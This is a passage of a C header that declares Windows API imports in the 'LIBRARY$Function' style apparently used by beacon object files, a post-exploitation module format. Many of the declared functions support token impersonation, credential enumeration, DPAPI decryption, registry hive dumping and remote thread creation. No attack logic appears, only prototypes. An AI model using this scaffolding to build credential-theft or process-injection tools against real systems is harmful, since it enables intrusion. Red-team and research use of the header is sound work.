WINADVAPI LONG    WINAPI ADVAPI32$RegQueryInfoKeyA(HKEY hKey,LPSTR lpClass,LPDWORD lpcchClass,LPDWORD lpReserved,LPDWORD lpcSubKeys,LPDWORD lpcbMaxSubKeyLen,LPDWORD lpcbMaxClassLen,LPDWORD lpcValues,LPDWORD lpcbMaxValueNameLen,LPDWORD lpcbMaxValueLen,LPDWORD lpcbSecurityDescriptor,PFILETIME lpftLastWriteTime);
WINADVAPI LONG    WINAPI ADVAPI32$RegEnumValueA(HKEY hKey,DWORD dwIndex,LPSTR lpValueName,LPDWORD lpcchValueName,LPDWORD lpReserved,LPDWORD lpType,LPBYTE lpData,LPDWORD lpcbData);
WINADVAPI LONG    WINAPI ADVAPI32$RegEnumKeyExA(HKEY hKey,DWORD dwIndex,LPSTR lpName,LPDWORD lpcchName,LPDWORD lpReserved,LPSTR lpClass,LPDWORD lpcchClass,PFILETIME lpftLastWriteTime);
WINADVAPI LONG    WINAPI ADVAPI32$RegEnumKeyExW(HKEY hKey,DWORD dwIndex,LPWSTR lpName,LPDWORD lpcchName,LPDWORD lpReserved,LPWSTR lpClass,LPDWORD lpcchClass,PFILETIME lpftLastWriteTime);
WINADVAPI LONG    WINAPI ADVAPI32$RegEnumValueW(HKEY hKey,DWORD dwIndex,LPWSTR lpValueName,LPDWORD lpcchValueName,LPDWORD lpReserved,LPDWORD lpType,LPBYTE lpData,LPDWORD lpcbData);
WINADVAPI LONG    WINAPI ADVAPI32$RegDeleteValueA(HKEY hKey,LPCSTR lpValueName);
WINADVAPI LONG    WINAPI ADVAPI32$RegQueryValueExW(HKEY hKey,LPCWSTR lpValueName,LPDWORD lpReserved,LPDWORD lpType,LPBYTE lpData,LPDWORD lpcbData);
WINADVAPI LONG    WINAPI ADVAPI32$RegSaveKeyExA(HKEY hKey,LPCSTR lpFile,LPSECURITY_ATTRIBUTES lpSecurityAttributes,DWORD Flags);
WINADVAPI WINBOOL WINAPI ADVAPI32$GetFileSecurityW (LPCWSTR lpFileName, SECURITY_INFORMATION RequestedInformation, PSECURITY_DESCRIPTOR pSecurityDescriptor, DWORD nLength, LPDWORD lpnLengthNeeded);
WINADVAPI WINBOOL WINAPI ADVAPI32$GetSecurityDescriptorOwner (PSECURITY_DESCRIPTOR pSecurityDescriptor, PSID *pOwner, LPBOOL lpbOwnerDefaulted);
WINADVAPI WINBOOL WINAPI ADVAPI32$GetSecurityDescriptorDacl (PSECURITY_DESCRIPTOR pSecurityDescriptor, LPBOOL lpbDaclPresent, PACL *pDacl, LPBOOL lpbDaclDefaulted);
WINADVAPI WINBOOL WINAPI ADVAPI32$GetAclInformation (PACL pAcl, LPVOID pAclInformation, DWORD nAclInformationLength, ACL_INFORMATION_CLASS dwAclInformationClass);
WINADVAPI WINBOOL WINAPI ADVAPI32$GetAce (PACL pAcl, DWORD dwAceIndex, LPVOID *pAce);
WINADVAPI WINBOOL WINAPI ADVAPI32$LookupAccountSidW (LPCWSTR lpSystemName, PSID Sid, LPWSTR Name, LPDWORD cchName, LPWSTR ReferencedDomainName, LPDWORD cchReferencedDomainName, PSID_NAME_USE peUse);
WINADVAPI WINBOOL WINAPI ADVAPI32$ConvertSidToStringSidW(PSID Sid,LPWSTR *StringSid);
WINADVAPI VOID    WINAPI ADVAPI32$MapGenericMask (PDWORD AccessMask, PGENERIC_MAPPING GenericMapping);
WINADVAPI WINBOOL WINAPI ADVAPI32$OpenProcessToken (HANDLE ProcessHandle, DWORD DesiredAccess, PHANDLE TokenHandle);
WINADVAPI WINBOOL WINAPI ADVAPI32$GetTokenInformation (HANDLE TokenHandle, TOKEN_INFORMATION_CLASS TokenInformationClass, LPVOID TokenInformation, DWORD TokenInformationLength, PDWORD ReturnLength);
WINADVAPI WINBOOL WINAPI ADVAPI32$InitializeSecurityDescriptor (PSECURITY_DESCRIPTOR pSecurityDescriptor, DWORD dwRevision);
WINADVAPI WINBOOL WINAPI ADVAPI32$SetSecurityDescriptorDacl (PSECURITY_DESCRIPTOR pSecurityDescriptor, WINBOOL bDaclPresent, PACL pDacl, WINBOOL bDaclDefaulted);
WINADVAPI WINBOOL WINAPI ADVAPI32$ConvertSecurityDescriptorToStringSecurityDescriptorW(PSECURITY_DESCRIPTOR SecurityDescriptor,DWORD RequestedStringSDRevision,SECURITY_INFORMATION SecurityInformation,LPWSTR *StringSecurityDescriptor,PULONG StringSecurityDescriptorLen);
WINADVAPI WINBOOL WINAPI ADVAPI32$StartServiceA(SC_HANDLE hService,DWORD dwNumServiceArgs,LPCSTR *lpServiceArgVectors);
WINADVAPI WINBOOL WINAPI ADVAPI32$ControlService(SC_HANDLE hService,DWORD dwControl,LPSERVICE_STATUS lpServiceStatus);
WINADVAPI WINBOOL WINAPI ADVAPI32$EnumDependentServicesA(SC_HANDLE hService,DWORD dwServiceState,LPENUM_SERVICE_STATUSA lpServices,DWORD cbBufSize,LPDWORD pcbBytesNeeded,LPDWORD lpServicesReturned);
WINADVAPI LSTATUS WINAPI ADVAPI32$RegQueryInfoKeyA(HKEY hKey, LPSTR lpClass, LPDWORD lpcchClass, LPDWORD lpReserved, LPDWORD lpcSubKeys, LPDWORD lpcbMaxSubKeyLen, LPDWORD lpcbMaxClassLen, LPDWORD lpcValues, LPDWORD lpcbMaxValueNameLen, LPDWORD lpcbMaxValueLen, LPDWORD lpcbSecurityDescriptor, PFILETIME lpftLastWriteTime);
WINADVAPI WINBOOL WINAPI ADVAPI32$LookupPrivilegeValueW(LPCWSTR lpSystemName, LPCWSTR lpName, PLUID lpLuid);
WINADVAPI WINBOOL WINAPI ADVAPI32$LookupPrivilegeValueA(LPCSTR lpSystemName, LPCSTR lpName, PLUID lpLuid);
WINADVAPI WINBOOL WINAPI ADVAPI32$AdjustTokenPrivileges(HANDLE TokenHandle, WINBOOL DisableAllPrivileges, PTOKEN_PRIVILEGES NewState, DWORD BufferLength, PTOKEN_PRIVILEGES PreviousState, PDWORD ReturnLength);
WINADVAPI WINBOOL WINAPI ADVAPI32$OpenThreadToken(HANDLE ThreadHandle, DWORD DesiredAccess, WINBOOL OpenAsSelf, PHANDLE TokenHandle);
WINADVAPI WINBOOL WINAPI ADVAPI32$DuplicateToken(HANDLE ExistingTokenHandle, SECURITY_IMPERSONATION_LEVEL ImpersonationLevel, PHANDLE DuplicateTokenHandle);
WINADVAPI WINBOOL WINAPI ADVAPI32$DuplicateTokenEx(HANDLE hExistingToken, DWORD dwDesiredAccess, LPSECURITY_ATTRIBUTES lpTokenAttributes, SECURITY_IMPERSONATION_LEVEL ImpersonationLevel, TOKEN_TYPE TokenType, PHANDLE phNewToken);
WINADVAPI WINBOOL WINAPI ADVAPI32$ImpersonateLoggedOnUser(HANDLE hToken);
WINADVAPI WINBOOL WINAPI ADVAPI32$ImpersonateNamedPipeClient(HANDLE hNamedPipe);
WINADVAPI WINBOOL WINAPI ADVAPI32$SetThreadToken(PHANDLE Thread, HANDLE Token);
WINADVAPI WINBOOL WINAPI ADVAPI32$RevertToSelf(VOID);
WINADVAPI WINBOOL WINAPI ADVAPI32$LogonUserA(LPCSTR lpszUsername, LPCSTR lpszDomain, LPCSTR lpszPassword, DWORD dwLogonType, DWORD dwLogonProvider, PHANDLE phToken);
WINADVAPI WINBOOL WINAPI ADVAPI32$LogonUserW(LPCWSTR lpszUsername, LPCWSTR lpszDomain, LPCWSTR lpszPassword, DWORD dwLogonType, DWORD dwLogonProvider, PHANDLE phToken);
WINADVAPI WINBOOL WINAPI ADVAPI32$CreateProcessAsUserW(HANDLE hToken, LPCWSTR lpApplicationName, LPWSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES lpThreadAttributes, WINBOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCWSTR lpCurrentDirectory, LPSTARTUPINFOW lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation);
WINADVAPI WINBOOL WINAPI ADVAPI32$CreateProcessWithTokenW(HANDLE hToken, DWORD dwLogonFlags, LPCWSTR lpApplicationName, LPWSTR lpCommandLine, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCWSTR lpCurrentDirectory, LPSTARTUPINFOW lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation);
WINADVAPI DWORD   WINAPI ADVAPI32$GetLengthSid(PSID pSid);
WINADVAPI WINBOOL WINAPI ADVAPI32$CopySid(DWORD nDestinationSidLength, PSID pDestinationSid, PSID pSourceSid);
WINADVAPI WINBOOL WINAPI ADVAPI32$GetFileSecurityA(LPCSTR lpFileName, SECURITY_INFORMATION RequestedInformation, PSECURITY_DESCRIPTOR pSecurityDescriptor, DWORD nLength, LPDWORD lpnLengthNeeded);
WINADVAPI WINBOOL WINAPI ADVAPI32$AccessCheck(PSECURITY_DESCRIPTOR pSecurityDescriptor, HANDLE ClientToken, DWORD DesiredAccess, PGENERIC_MAPPING GenericMapping, PPRIVILEGE_SET PrivilegeSet, LPDWORD PrivilegeSetLength, LPDWORD GrantedAccess, LPBOOL AccessStatus);
WINADVAPI WINBOOL WINAPI ADVAPI32$CredEnumerateW(LPCWSTR Filter, DWORD Flags, DWORD *Count, PCREDENTIALW **Credentials);
WINADVAPI WINBOOL WINAPI ADVAPI32$CredEnumerateA(LPCSTR Filter, DWORD Flags, DWORD *Count, PCREDENTIALA **Credentials);
WINADVAPI VOID    WINAPI ADVAPI32$CredFree(PVOID Buffer);
WINADVAPI WINBOOL WINAPI ADVAPI32$QueryServiceObjectSecurity(SC_HANDLE hService, SECURITY_INFORMATION dwSecurityInformation, PSECURITY_DESCRIPTOR lpSecurityDescriptor, DWORD cbBufSize, LPDWORD pcbBytesNeeded);
WINADVAPI WINBOOL WINAPI ADVAPI32$CheckTokenMembership(HANDLE TokenHandle, PSID SidToCheck, PBOOL IsMember);
WINADVAPI WINBOOL WINAPI ADVAPI32$EqualSid(PSID pSid1, PSID pSid2);
WINADVAPI WINBOOL WINAPI ADVAPI32$AllocateAndInitializeSid(PSID_IDENTIFIER_AUTHORITY pIdentifierAuthority, BYTE nSubAuthorityCount, DWORD nSubAuthority0, DWORD nSubAuthority1, DWORD nSubAuthority2, DWORD nSubAuthority3, DWORD nSubAuthority4, DWORD nSubAuthority5, DWORD nSubAuthority6, DWORD nSubAuthority7, PSID *pSid);
WINADVAPI PVOID   WINAPI ADVAPI32$FreeSid(PSID pSid);
WINADVAPI PDWORD  WINAPI ADVAPI32$GetSidSubAuthority(PSID pSid, DWORD nSubAuthority);
WINADVAPI PUCHAR  WINAPI ADVAPI32$GetSidSubAuthorityCount(PSID pSid);
WINADVAPI WINBOOL WINAPI ADVAPI32$CryptAcquireContextA(HCRYPTPROV *phProv, LPCSTR szContainer, LPCSTR szProvider, DWORD dwProvType, DWORD dwFlags);
WINADVAPI WINBOOL WINAPI ADVAPI32$CryptCreateHash(HCRYPTPROV hProv, ALG_ID Algid, HCRYPTKEY hKey, DWORD dwFlags, HCRYPTHASH *phHash);
WINADVAPI WINBOOL WINAPI ADVAPI32$CryptReleaseContext(HCRYPTPROV hProv, DWORD dwFlags);
WINADVAPI WINBOOL WINAPI ADVAPI32$CryptHashData(HCRYPTHASH hHash, const BYTE *pbData, DWORD dwDataLen, DWORD dwFlags);
WINADVAPI WINBOOL WINAPI ADVAPI32$CryptDestroyHash(HCRYPTHASH hHash);
WINADVAPI WINBOOL WINAPI ADVAPI32$CryptGetHashParam(HCRYPTHASH hHash, DWORD dwParam, BYTE *pbData, DWORD *pdwDataLen, DWORD dwFlags);
WINADVAPI WINBOOL WINAPI ADVAPI32$CryptImportKey(HCRYPTPROV hProv, const BYTE *pbData, DWORD dwDataLen, HCRYPTKEY hPubKey, DWORD dwFlags, HCRYPTKEY *phKey);
WINADVAPI WINBOOL WINAPI ADVAPI32$CryptSetKeyParam(HCRYPTKEY hKey, DWORD dwParam, const BYTE *pbData, DWORD dwFlags);
WINADVAPI WINBOOL WINAPI ADVAPI32$CryptDecrypt(HCRYPTKEY hKey, HCRYPTHASH hHash, BOOL Final, DWORD dwFlags, BYTE *pbData, DWORD *pdwDataLen);
WINADVAPI WINBOOL WINAPI ADVAPI32$CryptDestroyKey(HCRYPTKEY hKey);
WINADVAPI LONG    WINAPI ADVAPI32$RegGetValueA(HKEY hkey, LPCSTR lpSubKey, LPCSTR lpValue, DWORD dwFlags, LPDWORD pdwType, PVOID pvData, LPDWORD pcbData);
WINADVAPI LONG    WINAPI ADVAPI32$RegSaveKeyA(HKEY hKey, LPCSTR lpFile, LPSECURITY_ATTRIBUTES lpSecurityAttributes);
WINADVAPI LONG    WINAPI ADVAPI32$RegDeleteTreeA(HKEY base, LPCSTR subkey);
WINADVAPI WINBOOL WINAPI ADVAPI32$ConvertStringSecurityDescriptorToSecurityDescriptorA(LPCSTR StringSecurityDescriptor,DWORD StringSDRevision,PSECURITY_DESCRIPTOR *SecurityDescriptor,PULONG SecurityDescriptorSize);
WINADVAPI BOOLEAN WINAPI ADVAPI32$SystemFunction036(PVOID RandomBuffer, ULONG RandomBufferLength);
WINADVAPI LSTATUS WINAPI ADVAPI32$RegOpenKeyW(HKEY hKey, LPCWSTR lpSubKey, PHKEY phkResult);
WINADVAPI LONG    WINAPI ADVAPI32$RegQueryInfoKeyW(HKEY hKey, LPWSTR lpClass, LPDWORD lpcchClass, LPDWORD lpReserved, LPDWORD lpcSubKeys, LPDWORD lpcMaxSubKeyLen, LPDWORD lpcMaxClassLen, LPDWORD lpcValues, LPDWORD lpcMaxValueNameLen, LPDWORD lpcMaxValueLen, LPDWORD lpcbSecurityDescriptor, PFILETIME lpftLastWriteTime);
WINADVAPI LSTATUS WINAPI ADVAPI32$RegLoadKeyA(HKEY, LPCSTR, LPCSTR);
WINADVAPI LSTATUS WINAPI ADVAPI32$RegUnLoadKeyA(HKEY hKey, LPCSTR lpSubKey);


//NTDLL
WINBASEAPI NTSTATUS NTAPI NTDLL$NtCreateFile(PHANDLE FileHandle,ACCESS_MASK DesiredAccess,POBJECT_ATTRIBUTES ObjectAttributes,PIO_STATUS_BLOCK IoStatusBlock,PLARGE_INTEGER AllocationSize,ULONG FileAttributes,ULONG ShareAccess,ULONG CreateDisposition,ULONG CreateOptions,PVOID EaBuffer,ULONG EaLength);
WINBASEAPI NTSTATUS NTAPI NTDLL$NtClose(HANDLE Handle);
WINBASEAPI NTSTATUS NTAPI NTDLL$NtFsControlFile(HANDLE FileHandle,HANDLE Event,PIO_APC_ROUTINE ApcRoutine,PVOID ApcContext,PIO_STATUS_BLOCK IoStatusBlock,ULONG IoControlCode,PVOID InputBuffer,ULONG InputBufferLength,PVOID OutputBuffer,ULONG OutputBufferLength);
WINBASEAPI NTSTATUS NTAPI NTDLL$NtAllocateVirtualMemory(HANDLE ProcessHandle, PVOID * BaseAddress, ULONG ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect);
WINBASEAPI NTSTATUS NTAPI NTDLL$NtProtectVirtualMemory(HANDLE ProcessHandle, PVOID* BaseAddress, PSIZE_T NumberOfBytesToProtect, ULONG NewAccessProtection, PULONG OldAccessProtection);
WINBASEAPI NTSTATUS NTAPI NTDLL$NtFreeVirtualMemory(HANDLE ProcessHandle, PVOID* BaseAddress, PSIZE_T RegionSize, ULONG FreeType);
WINBASEAPI NTSTATUS NTAPI NTDLL$NtFlushInstructionCache(HANDLE ProcessHandle, PVOID BaseAddress, ULONG FlushSize);
WINBASEAPI BOOLEAN NTSYSAPI NTDLL$RtlCreateUnicodeString(PUNICODE_STRING DestinationString, PCWSTR SourceString);
WINBASEAPI NTSTATUS NTAPI NTDLL$RtlUnicodeStringToAnsiString(PANSI_STRING DestinationString, PCUNICODE_STRING SourceString, BOOLEAN AllocateDestinationString);
WINBASEAPI NTSTATUS NTAPI NTDLL$NtQueryVirtualMemory(HANDLE ProcessHandle, PVOID BaseAddress, int MemoryInformationClass, PVOID MemoryInformation, SIZE_T MemoryInformationLength, PSIZE_T ReturnLength);
WINBASEAPI NTSTATUS NTAPI NTDLL$NtCreateThreadEx(PHANDLE ThreadHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, HANDLE ProcessHandle, PVOID StartRoutine, PVOID Argument, ULONG CreateFlags, SIZE_T ZeroBits, SIZE_T StackSize, SIZE_T MaximumStackSize, PVOID AttributeList);
WINBASEAPI SIZE_T NTSYSAPI NTDLL$RtlCompareMemory(VOID *Source1, VOID *Source2, SIZE_T Length);
WINBASEAPI NTSTATUS NTAPI NTDLL$NtGetContextThread(HANDLE, PCONTEXT);
WINBASEAPI NTSTATUS NTAPI NTDLL$NtSetContextThread(HANDLE, PCONTEXT);
WINBASEAPI NTSTATUS NTAPI NTDLL$NtQueryInformationProcess(HANDLE, PROCESSINFOCLASS, PVOID, ULONG, PULONG);
WINBASEAPI NTSTATUS NTAPI NTDLL$NtReadFile(HANDLE FileHandle, HANDLE Event, PIO_APC_ROUTINE ApcRoutine, PVOID ApcContext, PIO_STATUS_BLOCK IoStatusBlock, PVOID Buffer, ULONG Length, PLARGE_INTEGER ByteOffset, PULONG Key);
WINBASEAPI NTSTATUS NTAPI NTDLL$NtWriteFile(HANDLE FileHandle, HANDLE Event, PIO_APC_ROUTINE ApcRoutine, PVOID ApcContext, PIO_STATUS_BLOCK IoStatusBlock, PVOID Buffer, ULONG Length, PLARGE_INTEGER ByteOffset, PULONG Key);
WINBASEAPI VOID     NTAPI NTDLL$RtlInitUnicodeString(PUNICODE_STRING DestinationString, PCWSTR SourceString);
WINBASEAPI VOID     NTAPI NTDLL$RtlZeroMemory(PVOID Destination, SIZE_T Length);
DECLSPEC_IMPORT NTSTATUS WINAPI NTDLL$NtQuerySystemInformation(int SystemInformationClass,PVOID SystemInformation,ULONG SystemInformationLength,PULONG ReturnLength);
DECLSPEC_IMPORT NTSTATUS NTAPI NTDLL$NtQueryObject(HANDLE Handle, OBJECT_INFORMATION_CLASS ObjectInformationClass, PVOID ObjectInformation, ULONG ObjectInformationLength, PULONG ReturnLength);

//IMAGEHLP
WINBASEAPI WINBOOL IMAGEAPI IMAGEHLP$ImageEnumerateCertificates(HANDLE FileHandle,WORD TypeFilter,PDWORD CertificateCount,PDWORD Indices,DWORD IndexCount);
WINBASEAPI WINBOOL IMAGEAPI IMAGEHLP$ImageGetCertificateHeader(HANDLE FileHandle,DWORD CertificateIndex,LPWIN_CERTIFICATE Certificateheader);
WINBASEAPI WINBOOL IMAGEAPI IMAGEHLP$ImageGetCertificateData(HANDLE FileHandle,DWORD CertificateIndex,LPWIN_CERTIFICATE Certificate,PDWORD RequiredLength);

//crypt32
WINIMPM WINBOOL WINAPI CRYPT32$CryptVerifyMessageSignature (PCRYPT_VERIFY_MESSAGE_PARA pVerifyPara, DWORD dwSignerIndex, const BYTE *pbSignedBlob, DWORD cbSignedBlob, BYTE *pbDecoded, DWORD *pcbDecoded, PCCERT_CONTEXT *ppSignerCert);
WINIMPM DWORD WINAPI CRYPT32$CertGetNameStringW (PCCERT_CONTEXT pCertContext, DWORD dwType, DWORD dwFlags, void *pvTypePara, LPWSTR pszNameString, DWORD cchNameString);
WINIMPM PCCERT_CONTEXT WINAPI CRYPT32$CertCreateCertificateContext (DWORD dwCertEncodingType, const BYTE *pbCertEncoded, DWORD cbCertEncoded);
WINIMPM WINBOOL WINAPI CRYPT32$CertFreeCertificateContext (PCCERT_CONTEXT pCertContext);
WINIMPM WINBOOL WINAPI CRYPT32$CertGetCertificateContextProperty (PCCERT_CONTEXT pCertContext, DWORD dwPropId, void *pvData, DWORD *pcbData);
WINIMPM WINBOOL WINAPI CRYPT32$CertGetCertificateChain (HCERTCHAINENGINE hChainEngine, PCCERT_CONTEXT pCertContext, LPFILETIME pTime, HCERTSTORE hAdditionalStore, PCERT_CHAIN_PARA pChainPara, DWORD dwFlags, LPVOID pvReserved, PCCERT_CHAIN_CONTEXT *ppChainContext);
WINIMPM VOID WINAPI CRYPT32$CertFreeCertificateChain (PCCERT_CHAIN_CONTEXT pChainContext);
WINIMPM PCCRYPT_OID_INFO WINAPI CRYPT32$CryptFindOIDInfo (DWORD dwKeyType, void *pvKey, DWORD dwGroupId);
WINBASEAPI BOOL WINAPI CRYPT32$CryptUnprotectData(DATA_BLOB *pDataIn, LPWSTR *ppszDataDescr, DATA_BLOB *pOptionalEntropy, PVOID pvReserved, CRYPTPROTECT_PROMPTSTRUCT *pPromptStruct, DWORD dwFlags, DATA_BLOB *pDataOut);
WINBASEAPI BOOL WINAPI CRYPT32$CryptStringToBinaryA(LPCSTR pszString, DWORD cchString, DWORD dwFlags, BYTE *pbBinary, DWORD *pcbBinary, DWORD *pdwSkip, DWORD *pdwFlags);
WINBASEAPI BOOL WINAPI CRYPT32$CryptStringToBinaryW(LPCWSTR pszString, DWORD cchString, DWORD dwFlags, BYTE *pbBinary, DWORD *pcbBinary, DWORD *pdwSkip, DWORD *pdwFlags);
WINIMPM WINBOOL WINAPI CRYPT32$CryptEncodeObjectEx (DWORD dwCertEncodingType, LPCSTR lpszStructType, const void *pvStructInfo, DWORD dwFlags, PCRYPT_ENCODE_PARA pEncodePara, void *pvEncoded, DWORD *pcbEncoded);
WINIMPM WINBOOL WINAPI CRYPT32$CryptBinaryToStringW (CONST BYTE *pbBinary, DWORD cbBinary, DWORD dwFlags, LPWSTR pszString, DWORD *pcchString);
WINIMPM HCERTSTORE WINAPI CRYPT32$PFXImportCertStore (CRYPT_DATA_BLOB *pPFX, LPCWSTR szPassword, DWORD dwFlags);
WINIMPM PCCERT_CONTEXT WINAPI CRYPT32$CertEnumCertificatesInStore (HCERTSTORE hCertStore, PCCERT_CONTEXT pPrevCertContext);
WINIMPM WINBOOL WINAPI CRYPT32$CertAddCertificateContextToStore (HCERTSTORE hCertStore, PCCERT_CONTEXT pCertContext, DWORD dwAddDisposition, PCCERT_CONTEXT *ppStoreContext);
WINIMPM HCERTSTORE WINAPI CRYPT32$CertOpenStore (LPCSTR lpszStoreProvider, DWORD dwEncodingType, HCRYPTPROV_LEGACY hCryptProv, DWORD dwFlags, const void *pvPara);
WINIMPM WINBOOL WINAPI CRYPT32$CertCloseStore (HCERTSTORE hCertStore, DWORD dwFlags);
WINIMPM WINBOOL WINAPI CRYPT32$CertDeleteCertificateFromStore (PCCERT_CONTEXT pCertContext);
WINIMPM WINBOOL WINAPI CRYPT32$CryptBinaryToStringA (CONST BYTE *pbBinary, DWORD cbBinary, DWORD dwFlags, LPSTR pszString, DWORD *pcchString);
WINIMPM PCCERT_CONTEXT WINAPI CRYPT32$CertFindCertificateInStore (HCERTSTORE hCertStore, DWORD dwCertEncodingType, DWORD dwFindFlags, DWORD dwFindType, const void *pvFindPara, PCCERT_CONTEXT pPrevCertContext);
WINIMPM WINBOOL WINAPI CRYPT32$CertSetCertificateContextProperty (PCCERT_CONTEXT pCertContext, DWORD dwPropId, DWORD dwFlags, const void *pvData);
WINIMPM WINBOOL WINAPI CRYPT32$PFXExportCertStoreEx (HCERTSTORE hStore, CRYPT_DATA_BLOB *pPFX, LPCWSTR szPassword, void *pvPara, DWORD dwFlags);


//WS2_32
// defining this here to avoid including ws2tcpip.h which results in include order warnings when bofs include windows.h before bofdefs.h
#ifndef _WS2TCPIP_H_
typedef struct addrinfo {
    int ai_flags;
    int ai_family;
    int ai_socktype;
    int ai_protocol;
    size_t ai_addrlen;
    char *ai_canonname;
    struct sockaddr *ai_addr;
    struct addrinfo *ai_next;
} ADDRINFOA,*PADDRINFOA;
#endif

//WS2_32
DECLSPEC_IMPORT int __stdcall WS2_32$WSAStartup(WORD wVersionRequested, LPWSADATA lpWSAData);
DECLSPEC_IMPORT int __stdcall WS2_32$WSACleanup(void);
DECLSPEC_IMPORT int __stdcall WS2_32$connect(SOCKET sock, const struct sockaddr* name, int namelen);
DECLSPEC_IMPORT int __stdcall WS2_32$closesocket(SOCKET sock);
DECLSPEC_IMPORT void __stdcall WS2_32$freeaddrinfo(struct addrinfo* ai);
DECLSPEC_IMPORT int __stdcall WS2_32$getaddrinfo(char* host, char* port, const struct addrinfo* hints, struct addrinfo** result);
DECLSPEC_IMPORT u_long __stdcall WS2_32$htonl(u_long hostlong);
DECLSPEC_IMPORT u_short __stdcall WS2_32$htons(u_short hostshort);
DECLSPEC_IMPORT char * __stdcall WS2_32$inet_ntoa(struct in_addr in);
DECLSPEC_IMPORT int __stdcall WS2_32$ioctlsocket(SOCKET sock, long cmd, u_long* arg);
DECLSPEC_IMPORT int __stdcall WS2_32$select(int nfds, fd_set* readfds, fd_set* writefds, fd_set* exceptfds, const struct timeval* timeout);
DECLSPEC_IMPORT unsigned int __stdcall WS2_32$socket(int af, int type, int protocol);
DECLSPEC_IMPORT int __stdcall WS2_32$__WSAFDIsSet(SOCKET sock, struct fd_set* fdset);
DECLSPEC_IMPORT int __stdcall WS2_32$WSAGetLastError();
DECLSPEC_IMPORT LPCWSTR WINAPI WS2_32$InetNtopW(INT Family, LPCVOID pAddr, LPWSTR pStringBuf, size_t StringBufSIze);
DECLSPEC_IMPORT INT WINAPI WS2_32$inet_pton(INT Family, LPCSTR pStringBuf, PVOID pAddr);
DECLSPEC_IMPORT u_short __stdcall WS2_32$ntohs(u_short netshort);
DECLSPEC_IMPORT int __stdcall WS2_32$send(SOCKET s, const char *buf, int len, int flags);
DECLSPEC_IMPORT int __stdcall WS2_32$recv(SOCKET s, char *buf, int len, int flags);

//dnsapi
DECLSPEC_IMPORT VOID WINAPI DNSAPI$DnsFree(PVOID pData,DNS_FREE_TYPE FreeType);
DECLSPEC_IMPORT int  WINAPI DNSAPI$DnsGetCacheDataTable(PVOID data);

//OLE32
DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoInitializeEx (LPVOID pvReserved, DWORD dwCoInit);
DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoUninitialize (void);
DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoInitializeSecurity (PSECURITY_DESCRIPTOR pSecDesc, LONG cAuthSvc, SOLE_AUTHENTICATION_SERVICE *asAuthSvc, void *pReserved1, DWORD dwAuthnLevel, DWORD dwImpLevel, void *pAuthList, DWORD dwCapabilities, void *pReserved3);
DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoCreateInstance (REFCLSID rclsid, LPUNKNOWN pUnkOuter, DWORD dwClsContext, REFIID riid, LPVOID *ppv);
DECLSPEC_IMPORT HRESULT WINAPI OLE32$CLSIDFromString (LPCOLESTR lpsz, LPCLSID pclsid);
DECLSPEC_IMPORT HRESULT WINAPI OLE32$IIDFromString (LPCOLESTR lpsz, LPIID lpiid);
DECLSPEC_IMPORT int     WINAPI OLE32$StringFromGUID2 (REFGUID rguid, LPOLESTR lpsz, int cchMax);
DECLSPEC_IMPORT	HRESULT WINAPI OLE32$CoSetProxyBlanket(IUnknown* pProxy, DWORD dwAuthnSvc, DWORD dwAuthzSvc, OLECHAR* pServerPrincName, DWORD dwAuthnLevel, DWORD dwImpLevel, RPC_AUTH_IDENTITY_HANDLE pAuthInfo, DWORD dwCapabilities);
DECLSPEC_IMPORT LPVOID	WINAPI OLE32$CoTaskMemAlloc(SIZE_T cb);
DECLSPEC_IMPORT void	WINAPI OLE32$CoTaskMemFree(LPVOID pv);
DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoInitialize(LPVOID pvReserved);
DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoImpersonateClient(void);
DECLSPEC_IMPORT BOOL    WINAPI OLE32$IsEqualGUID(REFGUID rguid1, REFGUID rguid2);

//OLEAUT32
DECLSPEC_IMPORT BSTR	WINAPI OLEAUT32$SysAllocString(const OLECHAR *);
DECLSPEC_IMPORT BSTR	WINAPI OLEAUT32$SysAllocStringByteLen(LPCSTR psz, UINT len);
DECLSPEC_IMPORT INT		WINAPI OLEAUT32$SysReAllocString(BSTR *, const OLECHAR *);
DECLSPEC_IMPORT void	WINAPI OLEAUT32$SysFreeString(BSTR);
DECLSPEC_IMPORT UINT	WINAPI OLEAUT32$SysStringLen(BSTR);
DECLSPEC_IMPORT UINT	WINAPI OLEAUT32$SysStringByteLen(BSTR);
DECLSPEC_IMPORT void	WINAPI OLEAUT32$VariantInit(VARIANTARG *pvarg);
DECLSPEC_IMPORT void	WINAPI OLEAUT32$VariantClear(VARIANTARG *pvarg);
DECLSPEC_IMPORT HRESULT	WINAPI OLEAUT32$SysAddRefString(BSTR);
DECLSPEC_IMPORT HRESULT	WINAPI OLEAUT32$VariantChangeType(VARIANTARG *pvargDest, VARIANTARG *pvarSrc, USHORT wFlags, VARTYPE vt);
DECLSPEC_IMPORT void	WINAPI OLEAUT32$VarFormatDateTime(LPVARIANT pvarIn,int iNamedFormat,ULONG dwFlags,BSTR *pbstrOut);
DECLSPEC_IMPORT void	WINAPI OLEAUT32$SafeArrayDestroy(SAFEARRAY *psa);
DECLSPEC_IMPORT HRESULT	WINAPI OLEAUT32$SafeArrayLock(SAFEARRAY *psa);
DECLSPEC_IMPORT HRESULT	WINAPI OLEAUT32$SafeArrayGetLBound(SAFEARRAY *psa, UINT nDim, LONG *plLbound);
DECLSPEC_IMPORT HRESULT	WINAPI OLEAUT32$SafeArrayGetUBound(SAFEARRAY *psa, UINT nDim, LONG *plUbound);
DECLSPEC_IMPORT HRESULT	WINAPI OLEAUT32$SafeArrayGetElement(SAFEARRAY *psa, LONG *rgIndices, void *pv);
DECLSPEC_IMPORT UINT	WINAPI OLEAUT32$SafeArrayGetElemsize(SAFEARRAY *psa);
DECLSPEC_IMPORT HRESULT	WINAPI OLEAUT32$SafeArrayAccessData(SAFEARRAY *psa,void HUGEP **ppvData);
DECLSPEC_IMPORT HRESULT	WINAPI OLEAUT32$SafeArrayUnaccessData(SAFEARRAY *psa);

//dbghelp
